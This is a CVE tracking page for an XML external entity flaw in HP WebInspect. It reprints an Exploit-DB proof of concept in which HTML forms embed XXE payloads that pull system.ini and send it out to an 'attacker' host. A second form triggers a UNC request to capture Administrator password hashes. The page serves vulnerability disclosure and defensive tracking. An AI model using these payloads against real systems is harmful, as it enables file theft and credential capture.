CVE-2015-2125
Description
Unspecified vulnerability in HP WebInspect 7.x through 10.4 before 10.4 update 1 allows remote authenticated users to bypass intended access restrictions via unknown vectors.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
HP WebInspect 10.4 - XML External Entity Injection
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125
1. Create website that exploits vulnerability.
1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://attacker/?p=%payl;'>">
1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.
2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hp | webinspect | {"startIncluding":"7.8","endIncluding":"10.4"} | |
References
- http://www.securityfocus.com/bid/75036
- http://www.securitytracker.com/id/1032478
- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04695307
- https://www.exploit-db.com/exploits/37250/
- http://www.securityfocus.com/bid/75036
- http://www.securitytracker.com/id/1032478
- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04695307
- https://www.exploit-db.com/exploits/37250/
CWEs
CWE-611
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.